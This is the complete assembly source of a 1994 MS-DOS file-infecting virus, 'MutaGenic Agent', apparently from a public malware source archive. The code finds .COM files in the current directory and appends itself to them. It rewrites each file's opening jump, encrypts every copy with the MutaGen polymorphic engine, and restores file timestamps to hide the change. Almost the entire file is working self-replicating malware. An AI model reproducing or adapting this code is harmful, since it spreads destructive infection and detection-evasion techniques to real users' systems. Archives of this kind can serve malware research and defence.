MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.mgagent.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

175 lines
4.8 KiB
NASM

; MutaGenic Agent - MutaGen Test Virus
; by MnemoniX 1994
;
; This is an ordinary run-of-the-mill virus that infects a .COM file in
; the current directory on run and uses MutaGen to encrypt itself.
MGEN_SIZE equ 1032 ; size of MutaGen
ID equ 'MG' ; ID word
MAX_INFECTIONS equ 2 ; infections per run
extrn _MUTAGEN:near ; call MutaGen
code segment byte public 'code'
org 100h
assume cs:code,ds:code,es:code,ss:code
start:
db 0E9h,03h,00h ; jmp virus_begin
dw ID
host:
db 0CDh,020h,00
virus_begin:
call $+3 ; BP serves as pointer
pop bp
sub bp,offset $-1
mov byte ptr [bp+offset infect],0 ; clear infection flag
mov ah,2Fh ; get original DTA address
int 21h ; and save it
push bx
lea dx,[bp+END_MGEN] ; set our DTA to the end of the
mov ah,1Ah ; virus code
int 21h
call infect_search ; infection routine ...
pop dx ; ... and we're done
mov ah,1Ah
int 21h
mov di,100h ; enter in original five bytes of host
push di ; save DI as host address
lea si,[bp+offset prog_len] ; get address of original host header
mov si,[si] ; found at end of host program
add si,100h
movsb ; move five bytes
movsw
movsw
ret ; and call host
infect_search proc near
mov ah,4Eh ; search for first .COM file
lea dx,[bp+com_file] ; in directory
xor cx,cx
int 21h
jnc infect_file ; none present, leave
jmp inf_complete
infect_file:
mov ax,3D02h ; .COM file found, open
lea dx,[bp+END_MGEN+1Eh]
int 21h
mov bx,ax ; file handle in BX
mov ax,5700h ; get file date and time
int 21h ; and save it
push cx
push dx
lea dx,[bp+orig_header] ; now read in first five bytes
mov cx,5 ; of the file
mov ah,3Fh
int 21h
mov ax,4202h ; no, infect this file
call move_pointer ; (this call is to save bytes)
cmp ax,64000
jae infected ; file is too big, skip it
cmp [bp+offset orig_header+3],ID
je infected ; if previously infected, skip it
lea si,[bp+offset new_jump+1]
push [bp+offset prog_len] ; save original program length
mov [bp+offset prog_len],ax ; store this program length
add ax,2
mov [si],ax
lea dx,[bp+offset orig_header] ; store first five bytes of file
mov cx,5 ; at end of file
mov ah,40h
int 21h
; MutaGen calling routine
push bx
push bp
mov dx,[si] ; MutaGen offset calculation
add dx,103h
mov cx,VIRUS_SIZE ; write VIRUS_SIZE bytes
lea di,[bp+END_MGEN+80h] ; store at end of virus
lea si,[bp+offset virus_begin]
call _MUTAGEN
pop bp
pop bx
lea dx,[bp+offset END_MGEN+80h] ; write encrypted code
mov ah,40h ; to file
int 21h
pop [bp+offset prog_len] ; restore original program length
mov ax,4200h ; lastly, add our new jump instruction
call move_pointer ; to the beginning of the file
lea dx,[bp+offset new_jump]
mov cx,5 ; write five bytes to file
mov ah,40h
int 21h
inc byte ptr [bp+offset infect] ; set infection flag
infected:
pop dx ; restore time and date
pop cx
mov ax,5701h
int 21h
mov ah,3Eh ; close file
int 21h
cmp byte ptr [bp+offset infect],1 ; did an infection occur?
je inf_complete ; yes, go
mov ah,4Fh ; find another file
int 21h ; and repeat
jc inf_complete ; none found, quit
jmp infect_file
inf_complete:
ret
move_pointer:
xor cx,cx ; i'm being really stingy with space
xor dx,dx ; here ...
int 21h
ret
endp
com_file db '*.COM',0 ; .COM file
orig_header db 5 dup(0) ; first three bytes of program
new_jump db 0E9h,00,00 ; new jump instruction
dw ID ; ID signature
prog_len dw 3 ; length of file for return sequence
infect db 0
sig db '[MutaGenic Agent]',0
virus_end:
END_MGEN equ virus_end + MGEN_SIZE
VIRUS_SIZE equ virus_end - virus_begin + MGEN_SIZE
code ends
end start